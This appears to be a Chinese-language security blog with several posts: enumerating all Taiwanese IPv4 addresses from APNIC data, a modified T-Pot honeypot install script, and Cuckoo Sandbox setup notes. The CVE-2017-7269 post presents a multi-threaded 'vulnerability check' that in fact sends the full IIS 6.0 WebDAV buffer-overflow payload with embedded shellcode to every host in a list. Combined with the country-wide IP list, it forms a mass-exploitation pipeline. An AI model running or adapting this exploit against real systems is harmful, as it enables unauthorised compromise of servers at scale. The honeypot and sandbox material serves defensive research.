2017年5月25日 星期四

用APNIC找出台灣所有的IP位址

台灣的IP網段

台灣的IP地址是由APNIC(亞太網路資訊中心)分配,所以在APNIC官網上就可以查詢到最新分配给亞洲各國網段資料(當然包含台灣囉)。

連接以下的網址 http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest網友們就可以得到亞太地區的AS號和網段分配情况,如下:

######################################################################
#
#  CONDITIONS OF USE
# ____________________________________________________________________
# 
# 
# The files are freely available for download and use on the condition 
# that APNIC will not be held responsible for any loss or damage 
# arising from the use of the information contained in these reports.
# 
# APNIC endeavours to the best of its ability to ensure the accuracy 
# of these reports; however, APNIC makes no guarantee in this regard.
# 
# In particular, it should be noted that these reports seek to 
# indicate where resources were first allocated or assigned. It is not
# intended that these reports be considered as an authoritative 
# statement of the location in which any specific resource may 
# currently be in use.
# 
# For more information see: 
#
#       http://www.apnic.net/db/rir-stats-format.html
# or
# ftp://ftp.apnic.net/pub/apnic/stats/apnic/README.TXT
#
######################################################################
#
2|apnic|20170525|51743|19830613|20170524|+1000
apnic|*|asn|*|7756|summary
apnic|*|ipv4|*|37477|summary
apnic|*|ipv6|*|6510|summary
apnic|JP|asn|173|1|20020801|allocated
apnic|NZ|asn|681|1|20020801|allocated
apnic|AU|asn|1221|1|20000131|allocated
apnic|JP|asn|1233|1|20020801|allocated
apnic|KR|asn|1237|1|20020801|allocated
apnic|SG|asn|1250|1|20020801|allocated
apnic|TW|asn|1659|1|20020801|allocated
apnic|KR|asn|1704|1|20020801|allocated
apnic|TW|asn|1768|2|20020801|allocated
apnic|KR|asn|1781|1|20020801|allocated
apnic|AU|asn|1851|1|20020801|allocated
 
 
 
檔案格式的說明如下:

配發的機構 | 國家代碼|IP版本| 分配網段 | 分配IP數量 | 分配時間 | 狀態

apnic|TW|asn|1659|1|20020801|allocated
 
 
因此,若要取得該國的網段,這還需要再做進一步的IP Mask計算處理:


wget -O- 'http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest' | awk -F\| '/TW\|ipv4/ { printf("%s/%d\n", $4, 32-log($5)/log(2)) }' > ./tw_ip.list

這樣就會取得所有台灣的IP網段~~ :)


但是有網友需要所有的IP位址,這下就要花點小技巧囉:
首先請到 Github上面安裝 ipgen 這個專案項目

1.安装ipgen



$ git clone https://github.com/royhills/ipgen.git
$ cd ipgen
$ autoreconf --install
$ ./configure
$ make
$ make check
$ sudo make install


  注意事前必須先安装 automake 和 autoconf 套件

 

2. IP Generation Script

#!/bin/bash
while read line
do

        ipgen $line | tee -a ./tw.ip_address.list
done < ./tw_ip.list


所以全台灣的IP檔案大小約 489MB, 35,510,560 個IP(約3千多萬組IP)
<那.....中國有多少??>


是的~~
中國的IP檔案大小約 4.6GB, 338,261,890 個IP(約3億3千多萬組IP)

 


2017年5月21日 星期日

T-Pot: A Multi-Honeypot Platform 自動化安裝程序

參考自 https://github.com/dtag-dev-sec/t-pot-autoinstall 再修改一小部分囉~
1.安裝好ubuntu 後,把下面的shell program  存成檔案
2.以sudo 方式執行 

#!/bin/bash0 
##########################################################
# T-Pot 16.10 install script                             #
# Ubuntu server 16.04.0x, x64                            #
#                                                        #
# v1.0 by av, DTAG 2017-01-30                            #
#                                                        #
# based on T-Pot 16.10 Community Edition Script          #
# v16.10.0 by mo, DTAG, 2016-12-03                       #
# Modify by James , 2017-05-21                        #
##########################################################


# Let's create a function for colorful output
Color_ECHO () {
local myRED=1
local myWHT=7
tput setaf $myRED
echo $1 "$2"
tput setaf $myWHT
}

# used for hostname
fuRANDOMWORD () {
  local myWORDFILE=/usr/share/dict/names
  local myLINES=$(cat $myWORDFILE  | wc -l)
  local myRANDOM=$((RANDOM % $myLINES))
  local myNUM=$((myRANDOM * myRANDOM % $myLINES + 1))
  echo -n $(sed -n "$myNUM p" $myWORDFILE | tr -d \' | tr A-Z a-z)
}


Color_ECHO ""
echo "
##########################################################
# T-Pot 16.10 install script                             #
# for Ubuntu server 16.04.0x, x64                        #
# Modify by James , 2017-05-21                        #
##########################################################
Make sure the key-based SSH login for your normal user is working!
"

# check for superuser
if [[ $EUID -ne 0 ]]; then
    Color_ECHO "### This script must be run as root. Do not run via sudo! Script will abort!"
    exit 1
fi

echo "Which user do you usually work with?\nThis script is invoked by root, but what is your normal username?"
echo -n "Enter username: "
read myuser



# Make sure all the necessary prerequisites are met.
echo ""
echo "Checking prerequisites..."

# check if user exists
if ! grep -q $myuser /etc/passwd
then
Color_ECHO "### User '$myuser' not found. Script will abort!"
        exit 1
fi


# check if ssh daemon is running
sshstatus=$(service ssh status)
if [[ ! $sshstatus =~ "active (running)" ]];
then
echo "### SSH service is not running. Script will abort!"
echo "### Installing SSH service....."
apt-get install ssh -y
fi

# check for available, non-empty SSH key
if ! fgrep -qs ssh /home/$myuser/.ssh/authorized_keys
    then
        Color_ECHO "### No SSH key for user '$myuser' found in /home/$myuser/.ssh/authorized_keys.\n ### Script will abort!"
        Color_ECHO "Please run ssh-keygen first !"
        Color_ECHO "and cp /home/$myuse/.ssh/id_rsa.pub > /home/$myuser/.ssh/authorized_keys"  
        exit 1
fi


# check for default SSH port
sshport=$(fgrep Port /etc/ssh/sshd_config|cut -d ' ' -f2)
if [ $sshport != 22 ];
    then
        Color_ECHO "### SSH port is not 22. Script will abort!"
        exit 1
fi

# check if pubkey authentication is active
if ! fgrep -q "PubkeyAuthentication yes" /etc/ssh/sshd_config
then
Color_ECHO "### Public Key Authentication is disabled /etc/ssh/sshd_config. \n ### Enable it by changing PubkeyAuthentication to 'yes'."
exit 1
fi

# check for ubuntu 16.04. distribution
release=$(lsb_release -r|cut -d $'\t' -f2)
if [ $release != "16.04" ]
    then
        Color_ECHO "### Wrong distribution. Must be Ubuntu 16.04.*. Script will abort! "
        exit 1
fi

# Let's make sure there is a warning if running for a second time
if [ -f install.log ];
  then
        Color_ECHO "### Running more than once may complicate things. Erase install.log if you are really sure."
        exit 1
fi

# set locale
locale-gen "en_US.UTF-8"
export LC_ALL="en_US.UTF-8"


# Let's log for the beauty of it
set -e
exec 2> >(tee "install.err")
exec > >(tee "install.log")

echo "Everything looks OK..."
echo ""
clear
echo "##########################################################"
echo "#                                                        #"
echo "#     How do you want to proceed? Enter your choice.     #"
echo "#                                                        #"
echo "# 1 - T-Pot's STANDARD INSTALLATION                      #"
echo "#     Requirements: >=4GB RAM, >=64GB disk               #"
echo "#     Services: Cowrie, Dionaea, ElasticPot, Glastopf,   #"
echo "#     Honeytrap, ELK & Suricata                          #"
echo "#                                                        #"
echo "# 2 - T-Pot's HONEYPOTS ONLY (w/o INDUSTRIAL)            #"
echo "#     Requirements: >=3GB RAM, >=64GB disk               #"
echo "#     Services:                                          #"
echo "#     Cowrie, Dionaea, ElasticPot, Glastopf & Honeytrap  #"
echo "#                                                        #"
echo "# 3 - T-Pot's INDUSTRIAL EDITION                         #"
echo "#     Requirements: >=4GB RAM, >=64GB disk               #"
echo "#     Services: ConPot, eMobility, ELK & Suricata        #"
echo "#                                                        #"
echo "# 4 - T-Pot's FULL INSTALLATION                          #"
echo "#     Requirements: >=8GB RAM, >=128GB disk              #"
echo "#     Services: Everything                               #"
echo "#                                                        #"
echo "##########################################################"
echo ""
echo -n "Your choice: "
read choice
if [[ "$choice" != [1-4] ]];
then
    Color_ECHO "### You typed $choice, which I don't recognize. It's either '1', '2', '3' or '4'. Script will abort!"
            exit 1
fi
case $choice in
1)
    echo "You chose T-Pot's STANDARD INSTALLATION. The best default ever!"
    mode="TPOT"
    ;;
2)
    echo "You chose to install T-Pot's HONEYPOTS ONLY. Ack."
    mode="HP"
    ;;
3)
    echo "You chose T-Pot's INDUSTRIAL EDITION. ICS is the new IOT."
    mode="INDUSTRIAL"
    ;;
4)
    echo "You chose to install T-Pot's FULL INSTALLATION. Bring it on..."
    mode="ALL"
    ;;

*)
    Color_ECHO "### You typed $choice, which I don't recognize. It's either '1', '2', '3' or '4'. Script will abort!"
    exit 1
    ;;
esac


# End checks

# Let's pull some updates
Color_ECHO "### Pulling Updates."
apt-get update -y
Color_ECHO "### Installing Updates."
apt-get upgrade -y

# Install packages needed
apt-get install apt-transport-https ca-certificates curl dialog dnsutils dstat ethtool genisoimage git htop libpam-google-authenticator lm-sensors ntp openssh-server syslinux pv vim apache2-utils apparmor nginx aufs-tools bash-completion build-essential  cgroupfs-mount docker.io glances html2text iptables iw libltdl7 man nginx-extras nodejs npm ntp openssl psmisc python-pip -y

# Let's clean up apt
apt-get autoclean -y
apt-get autoremove -y

# Let's remove NGINX default website
Color_ECHO "### Removing NGINX default website."
rm /etc/nginx/sites-enabled/default
rm /etc/nginx/sites-available/default
rm /usr/share/nginx/html/index.html

# Let's ask user for a password for the web user
myOK="n"
myUSER=$myuser
Color_ECHO "### Please enter a password for your user $myuser for web access."
myPASS1="pass1"
myPASS2="pass2"
while [ "$myPASS1" != "$myPASS2"  ]
  do
    while [ "$myPASS1" == "pass1"  ] || [ "$myPASS1" == "" ]
      do
        read -s -p "Password: " myPASS1
        Color_ECHO
      done
    read -s -p "Repeat password: " myPASS2
    Color_ECHO
    if [ "$myPASS1" != "$myPASS2" ];
      then
        Color_ECHO "### Passwords do not match."
        myPASS1="pass1"
        myPASS2="pass2"
    fi
  done
htpasswd -b -c /etc/nginx/nginxpasswd $myUSER $myPASS1
Color_ECHO

# Let's modify the sources list
sed -i '/cdrom/d' /etc/apt/sources.list

# Let's make sure SSH roaming is turned off (CVE-2016-0777, CVE-2016-0778)
Color_ECHO "### Let's make sure SSH roaming is turned off."
tee -a /etc/ssh/ssh_config <<EOF
UseRoaming no
EOF

# Let's generate a SSL certificate
Color_ECHO "### Generating a self-signed-certificate for NGINX."
Color_ECHO "### If you are unsure you can use the default values."
mkdir -p /etc/nginx/ssl
openssl req -nodes -x509 -sha512 -newkey rsa:8192 -keyout "/etc/nginx/ssl/nginx.key" -out "/etc/nginx/ssl/nginx.crt" -days 3650

# Installing alerta-cli, wetty
Color_ECHO "### Installing alerta-cli."
pip install --upgrade pip
pip install alerta
Color_ECHO "### Installing wetty."
ln -s /usr/bin/nodejs /usr/bin/node
npm install https://github.com/t3chn0m4g3/wetty -g


# Let's add a new user
Color_ECHO "### Adding new user."
addgroup --gid 2000 tpot
adduser --system --no-create-home --uid 2000 --disabled-password --disabled-login --gid 2000 tpot

# Let's set the hostname
Color_ECHO "### Setting a new hostname."
myHOST=$(curl -s -f www.nsanamegenerator.com | html2text | tr A-Z a-z | awk '{print $1}')
if [ "$myHOST" = "" ]; then
  Color_ECHO "### Failed to fetch name from remote, using local cache."
  myHOST=$(fuRANDOMWORD)
fi
hostnamectl set-hostname $myHOST
sed -i 's#127.0.1.1.*#127.0.1.1\t'"$myHOST"'#g' /etc/hosts

# Let's patch sshd_config
Color_ECHO "### Patching sshd_config to listen on port 64295 and deny password authentication."
sed -i 's#Port 22#Port 64295#' /etc/ssh/sshd_config
sed -i 's#\#PasswordAuthentication yes#PasswordAuthentication no#' /etc/ssh/sshd_config

# Let's allow ssh password authentication from RFC1918 networks
Color_ECHO "### Allow SSH password authentication from RFC1918 networks"
tee -a /etc/ssh/sshd_config <<EOF
Match address 127.0.0.1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
    PasswordAuthentication yes
EOF

# Let's patch docker defaults, so we can run images as service
Color_ECHO "### Patching docker defaults."
tee -a /etc/default/docker <<EOF
DOCKER_OPTS="-r=false"
EOF

# Let's restart docker for proxy changes to take effect
systemctl restart docker
sleep 5


# getting t-pot git repo
Color_ECHO "### Cloning T-Pot Repository."
cwdir=$(pwd)
git clone https://github.com/dtag-dev-sec/tpotce.git
cp -R $cwdir/tpotce/installer/ $cwdir
rm -rf $cwdir/tpotce/
rm $cwdir/installer/install.sh $cwdir/installer/rc.local.install
cwdir=$cwdir/installer
cd $cwdir

# we need to create a couple of directories
mkdir -p /data/

# Let's make sure only myFLAVOR images will be downloaded and started
case $mode in
  HP)
    echo "### Preparing HONEYPOT flavor installation."
    cp $cwdir/data/imgcfg/hp_images.conf /data/images.conf
  ;;
  INDUSTRIAL)
    echo "### Preparing INDUSTRIAL flavor installation."
    cp $cwdir/data/imgcfg/industrial_images.conf /data/images.conf
  ;;
  TPOT)
    echo "### Preparing TPOT flavor installation."
    cp $cwdir/data/imgcfg/tpot_images.conf /data/images.conf
  ;;
  ALL)
    echo "### Preparing EVERYTHING flavor installation."
    cp $cwdir/data/imgcfg/all_images.conf /data/images.conf
  ;;
esac

# Let's load docker images
Color_ECHO "### Loading docker images. Please be patient, this may take a while."
for name in $(cat /data/images.conf)
    do
      docker pull dtagdevsec/$name:latest1610
    done

# Let's patch /etc/issue for t-pot autoinstall
sed -i '14,15d' $cwdir/etc/issue
echo "Container status is written to ~/docker-status" >> $cwdir/etc/issue

# Let's add the daily update check with a weekly clean interval
Color_ECHO "### Modifying update checks."
tee /etc/apt/apt.conf.d/10periodic <<EOF
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Download-Upgradeable-Packages "0";
APT::Periodic::AutocleanInterval "7";
EOF

# Let's make sure to reboot the system after a kernel panic
Color_ECHO "### Reboot after kernel panic."
tee -a /etc/sysctl.conf <<EOF
# Reboot after kernel panic, check via /proc/sys/kernel/panic[_on_oops]
kernel.panic = 1
kernel.panic_on_oops = 1
EOF

# Let's add some conrjobs
Color_ECHO "### Adding cronjobs."
tee -a /etc/crontab <<EOF
# Determine running containers every 120s
*/2 * * * * root /usr/bin/status.sh > /home/$myuser/docker-status
# Check if containers and services are up
*/5 * * * * root /usr/bin/check.sh
# Example for alerta-cli IP update
#*/5 * * * * root alerta --endpoint-url http://<ip>:<port>/api delete --filters resource=<host> && alerta --endpoint-url http://<ip>:<port>/api send -e IP -r <host> -E Production -s ok -S T-Pot -t \$(cat /data/elk/logstash/mylocal.ip) --status open
# Check if updated images are available and download them
27 1 * * *   root for i in \$(cat /data/images.conf); do /usr/bin/docker pull dtagdevsec/\$i:latest1610; done
# Restart docker service and containers
27 3 * * * root /usr/bin/dcres.sh
# Delete elastic indices older than 90 days
27 4 * * *  root  /usr/bin/docker exec elk bash -c '/usr/local/bin/curator --host 127.0.0.1 delete indices --older-than 90 --time-unit days --timestring '%Y.%m.%d''
# Update IP and erase check.lock if it exists
27 15 * * * root /etc/rc.local
# Daily reboot
27 23 * * * root reboot
# Check for updated packages every sunday, upgrade and reboot
27 16 * * 0   root  apt-get autoclean -y; apt-get autoremove -y; apt-get update -y; apt-get upgrade -y; sleep 10; reboot
EOF

# Let's create some files and folders
Color_ECHO "### Creating some files and folders."
mkdir -p /data/conpot/log \
         /data/cowrie/log/tty/ /data/cowrie/downloads/ /data/cowrie/keys/ /data/cowrie/misc/ \
         /data/dionaea/log /data/dionaea/bistreams /data/dionaea/binaries /data/dionaea/rtp /data/dionaea/roots/ftp /data/dionaea/roots/tftp /data/dionaea/roots/www /data/dionaea/roots/upnp \
         /data/elasticpot/log \
         /data/elk/data /data/elk/log /data/elk/logstash/conf \
         /data/glastopf /data/honeytrap/log/ /data/honeytrap/attacks/ /data/honeytrap/downloads/ \
         /data/emobility/log \
         /data/ews/log /data/ews/conf /data/ews/dionaea /data/ews/emobility \
         /data/suricata/log /home/$myuser/.ssh/


# Let's take care of some files and permissions
chmod 500 $cwdir/bin/*
chmod 600 $cwdir/data/*
chmod 644 $cwdir/etc/issue
chmod 755 $cwdir/etc/rc.local
chmod 644 $cwdir/data/systemd/*

# Let's copy some files
tar xvfz $cwdir/data/elkbase.tgz -C /
cp $cwdir/data/elkbase.tgz /data/
cp -R $cwdir/bin/* /usr/bin/
cp -R $cwdir/data/* /data/
cp    $cwdir/data/systemd/* /etc/systemd/system/
cp    $cwdir/etc/issue /etc/
cp -R $cwdir/etc/nginx/ssl /etc/nginx/
cp    $cwdir/etc/nginx/tpotweb.conf /etc/nginx/sites-available/
cp    $cwdir/etc/nginx/nginx.conf /etc/nginx/nginx.conf
cp    $cwdir/usr/share/nginx/html/* /usr/share/nginx/html/

for i in $(cat /data/images.conf);
  do
    systemctl enable $i;
done
systemctl enable wetty

# Let's enable T-Pot website
Color_ECHO "### Enabling T-Pot website."
ln -s /etc/nginx/sites-available/tpotweb.conf /etc/nginx/sites-enabled/tpotweb.conf

# Let's take care of some files and permissions
chmod 760 -R /data
chown tpot:tpot -R /data
chmod 600 /home/$myuser/.ssh/authorized_keys
chown $myuser:$myuser /home/$myuser/.ssh /home/$myuser/.ssh/authorized_keys

# Let's replace "quiet splash" options, set a console font for more screen canvas and update grub
sed -i 's#GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"#GRUB_CMDLINE_LINUX_DEFAULT="consoleblank=0"#' /etc/default/grub
sed -i 's#GRUB_CMDLINE_LINUX=""#GRUB_CMDLINE_LINUX="cgroup_enable=memory swapaccount=1"#' /etc/default/grub
#sed -i 's#\#GRUB_GFXMODE=640x480#GRUB_GFXMODE=800x600x32#' /etc/default/grub
#tee -a /etc/default/grub <<EOF
#GRUB_GFXPAYLOAD=800x600x32
#GRUB_GFXPAYLOAD_LINUX=800x600x32
#EOF
update-grub
cp /usr/share/consolefonts/Uni2-Terminus12x6.psf.gz /etc/console-setup/
gunzip /etc/console-setup/Uni2-Terminus12x6.psf.gz
sed -i 's#FONTFACE=".*#FONTFACE="Terminus"#' /etc/default/console-setup
sed -i 's#FONTSIZE=".*#FONTSIZE="12x6"#' /etc/default/console-setup
update-initramfs -u

# Let's enable a color prompt
myROOTPROMPT='PS1="\[\033[38;5;8m\][\[$(tput sgr0)\]\[\033[38;5;1m\]\u\[$(tput sgr0)\]\[\033[38;5;6m\]@\[$(tput sgr0)\]\[\033[38;5;4m\]\h\[$(tput sgr0)\]\[\033[38;5;6m\]:\[$(tput sgr0)\]\[\033[38;5;5m\]\w\[$(tput sgr0)\]\[\033[38;5;8m\]]\[$(tput sgr0)\]\[\033[38;5;1m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]"'
myUSERPROMPT='PS1="\[\033[38;5;8m\][\[$(tput sgr0)\]\[\033[38;5;2m\]\u\[$(tput sgr0)\]\[\033[38;5;6m\]@\[$(tput sgr0)\]\[\033[38;5;4m\]\h\[$(tput sgr0)\]\[\033[38;5;6m\]:\[$(tput sgr0)\]\[\033[38;5;5m\]\w\[$(tput sgr0)\]\[\033[38;5;8m\]]\[$(tput sgr0)\]\[\033[38;5;2m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]"'
tee -a /root/.bashrc << EOF
$myROOTPROMPT
EOF
tee -a /home/$myuser/.bashrc << EOF
$myUSERPROMPT
EOF

# Let's create ews.ip before reboot and prevent race condition for first start
myLOCALIP=$(hostname -I | awk '{ print $1 }')
myEXTIP=$(curl myexternalip.com/raw)
sed -i "s#IP:.*#IP: $myLOCALIP, $myEXTIP#" /etc/issue
sed -i "s#SSH:.*#SSH: ssh -l $myuser -p 64295 $myLOCALIP#" /etc/issue
sed -i "s#WEB:.*#WEB: https://$myLOCALIP:64297#" /etc/issue

tee /data/ews/conf/ews.ip << EOF
[MAIN]
ip = $myEXTIP
EOF
echo $myLOCALIP > /data/elk/logstash/mylocal.ip
chown $myuser:$myuser /data/ews/conf/ews.ip

# change user for wetty
sed -i 's/tsec/'$myuser'/' /etc/systemd/system/wetty.service
sed -i 's/tsec/'$myuser'/' /usr/share/nginx/html/navbar.html
systemctl daemon-reload

# Final steps
Color_ECHO "### Thanks for your patience. Now rebooting. Remember to login on SSH port 64295 next time or visit dashboard at port 64297!"
mv $cwdir/etc/rc.local /etc/rc.local && rm -rf $cwdir && sleep 2 &&reboot

2017年4月1日 星期六

CVE-2017-7269 Vulnerability (Multi-Threaded Check)

Microsoft IIS 6.0 Buffer Overflow Zero Day


參考網路上公布POC Code自行改寫的多執行緒IIS6 CVE-2017-7269漏洞檢測程式

#!/usr/bin/python

import sys
import socket
import threading
import time
global data


class Scanner(threading.Thread):
    def __init__(self, host, port):
        threading.Thread.__init__(self)
        self.host = host
        self.port = port
        self.status = ""

    def run(self):
        pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
        pay+='If: <http://localhost/aaaaaaa'
        pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
        pay+='>'
        pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
        pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
        shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N10WRJLMSSI7LNR72JPTKOXPQ3PV0ENM02NPNQNWNMNWOBNVP9KPOS2O2NT4S52N44NMB4RYD0C5OJMPBTQURX44NORH2TRMBLLMKZPCRORNSDQU2N2TNMPL1URN2GT4S8OJOBOFMPLMKZLMLJOXOX1924MPOSPV0ENMNRP0NQNWNMOGNROFP9O01CRU3333RET3SCM0M0A'
        pay+=shellcode
        pay+='>\r\n\r\n'
 
        self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sk.settimeout(10)
        data = ""
        try:
            self.sk.connect((self.host, self.port))
   self.sk.send(pay)
   data = self.sk.recv(80960)

        except Exception, err:
            pass
   #self.status = str(err)
        else:
            #self.status = "connected"
   if not -1==data.find('HHIT CVE-2017-7269 Success') :
               print "Found Vulnerable on Host : "+self.host
               with open("CVE-2017-Check.log", "a") as ff:
                 ff.write("Found Vulnerable on Host : "+self.host+"\n")
               ff.close()
        finally:
            self.sk.close()


def get_hostnames_list(filename):
    return open(filename).read().splitlines()

if (__name__ == "__main__"):
    hostnames_file = sys.argv[1]
    hosts_list = get_hostnames_list(hostnames_file)
    threads = []
    for host in hosts_list:
        ##time.sleep(1)
        thread = Scanner(host, 80)
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()
        print "Host: ", thread.host, " : ", thread.status


2017年3月24日 星期五

How to Install Cuckoo Sandbox? [Step3]

Configuration

Step1:修改cuckoo的設定與參數

在Cuckoo 的conf目錄下有幾個設定檔案,但是最基本、基礎的設定值只要幾個:

請先修改reporting.conf
[jsondump]
enabled = yes <== no 改為yes
indent = 4
encoding = latin-1
calls = yes

[reporthtml]
enabled = yes <== no 改為yes

[mongodb]
enabled = yes  <== no 改為yes
host = 127.0.0.1
port = 27017
db = cuckoo
store_memdump = yes
paginate = 100

再來修改virtualbox.conf
[cuckoo1]
label = Win7_32 <==虛擬機的名稱

Step2:啟動cuckoo 及 入口網頁介面

1)在cuckoo目錄下執行./cuckoo.py

